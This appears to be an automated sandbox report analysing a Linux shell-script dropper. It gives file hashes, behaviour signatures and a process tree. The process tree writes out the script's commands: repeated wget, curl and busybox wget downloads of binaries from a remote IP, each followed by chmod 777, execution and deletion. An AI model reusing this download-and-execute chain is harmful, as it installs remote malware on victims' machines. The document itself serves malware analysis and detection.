Analysis
-
max time kernel
18s -
max time network
34s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
01-11-2024 02:32
Static task
static1
Behavioral task
behavioral1
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
-
Size
10KB
-
MD5
0e701247eed8c2ac85ce4310d37e674d
-
SHA1
7ca0caf639c6d80baffe549e24e3018daaa8bbb8
-
SHA256
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb
-
SHA512
0ef0aa05143b180e5260a49f2e87ebca0ecec3ab767bbbc7bc0761a2244b20b000aaffead5bd57071f0022821063d4c4ae9bb2efac893131009c19b2f57f556b
-
SSDEEP
96:PBRELvNSsmyUgEmy+bytMKk99ch83tkBRELvFSsQZFWyLJBmy+bytMs799chtE37:Y1myUgE5CVS3n
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 835 chmod 805 chmod 823 chmod 793 chmod 684 chmod 763 chmod 744 chmod 785 chmod 829 chmod 706 chmod 729 chmod 811 chmod 817 chmod 673 chmod 799 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m 675 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s 686 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 708 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys 731 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh 746 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 764 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK 786 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do 794 oieViux5SkcOflukQEESWqzwe8qoXmU0do /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT 800 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq 806 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH 812 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb 818 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV 824 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA 830 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m 836 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 curl File opened for modification /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 curl File opened for modification /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT curl File opened for modification /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s curl File opened for modification /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys curl File opened for modification /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV curl File opened for modification /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m curl File opened for modification /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m curl File opened for modification /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK curl File opened for modification /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do curl File opened for modification /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH curl File opened for modification /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh curl File opened for modification /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq curl File opened for modification /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb curl File opened for modification /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA curl
Processes
-
/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh1⤵PID:643
-
/bin/rm/bin/rm bins.sh2⤵PID:646
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:650
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:664
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:671
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:673
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:675
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:676
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:677
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:678
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:679
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:686
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:687
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:689
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:695
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:702
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:708
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:710
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:723
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:732
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:733
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:742
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:758
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:780
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:787
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:789
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:792
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:798
-
-
/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:804
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:810
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:816
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:822
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:828
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:834
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:838
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97